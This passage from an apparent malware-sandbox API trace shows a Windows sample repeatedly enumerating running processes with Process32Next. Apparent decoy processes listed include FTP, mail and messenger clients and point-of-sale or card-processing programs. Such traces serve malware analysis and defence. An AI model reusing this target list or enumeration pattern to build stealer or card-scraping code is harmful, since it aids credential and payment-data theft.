th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0230.562] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0230.563] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.565] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.566] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0230.568] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0230.569] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0230.571] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0230.572] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.577] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0230.578] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0230.580] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0230.581] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0230.583] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0230.584] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0230.586] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0230.587] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0230.622] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0230.624] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0230.626] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0230.628] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0230.629] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0230.631] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0230.637] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0230.640] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0230.643] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0230.646] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0230.648] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0230.649] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0230.650] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0230.655] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0230.657] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0230.659] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0230.661] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0230.662] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0230.664] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0230.666] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0230.719] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0230.721] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0230.723] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0230.725] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0230.726] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0230.728] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0230.733] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0230.736] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0230.739] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0230.741] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0230.744] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0230.750] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0230.752] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0230.755] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0230.757] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0230.759] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0230.772] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0230.775] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0230.780] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0230.783] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0230.785] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0230.788] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0230.790] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0230.797] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0230.799] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0230.802] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0230.804] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0230.806] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0230.812] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0230.815] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0230.817] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0230.819] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0230.821] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0230.894] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0230.897] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0230.899] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0230.907] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0230.910] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0230.913] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0230.925] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0230.931] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0230.943] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0231.048] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0231.050] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0231.052] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0231.054] CloseHandle (hObject=0xdc4) returned 1 [0231.054] Sleep (dwMilliseconds=0x64) [0231.175] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0231.188] Process32First (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.190] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, 